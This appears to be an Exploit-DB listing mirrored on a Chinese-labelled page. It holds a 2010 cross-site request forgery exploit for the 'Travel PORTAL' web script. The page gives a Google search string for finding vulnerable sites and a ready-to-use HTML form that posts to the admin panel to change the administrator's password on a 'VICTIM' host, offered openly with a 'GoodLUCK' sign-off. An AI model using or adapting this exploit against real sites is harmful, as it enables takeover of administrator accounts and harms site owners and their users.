Travel Portal Script – Cross-Site Request Forgery (Admin Password Change)

  • 作者: KnocKout
    日期: 2010-10-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15280/
  • =====================================================
    Travel PORTAL <= Admin Password Change (CSRF) Exploit
    =====================================================
    
    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockoutr@msn.com
    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    |~Web App. : Travel PORTAL
    |~Price : 299 Euro :)
    |~Version : N/A
    |~Software: http://www.tourismscripts.com
    |~Vulnerability Style : CSRF
    |~Vulnerability Dir : /admin
    |~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House "
    |[~]Date : "18.10.2010"
    |[~]Tested on : (L):Vista (R):Demos.
    ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ############################################################
    the target can be changed according to
    <form method="post" action="http://VICTIM/admin/admin.php">
    ############################################################
    
    ~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~
    
    ========(CSRF) Html Exploit=========
    
    <title>Exploited by KnocKout</title>
    </table>
    <br>
    <h3>Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout</h3>
    <table>
    
    <tr>
    <form method="post" action="http://server/admin/admin.php">
    <input type="hidden" name="admin_id" value="1">
    <td align=right>Admin Name:</td><td align=left>admin<td>
    </tr>
    <tr>
    <td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td>
    </tr>
    <tr>
    <td></td><td><input type="submit" name="submit" value="Update Password"></td>
    </form>
    </tr>
    </table>
    
    ========(CSRF) Html Exploit=========
    
     GoodLUCK.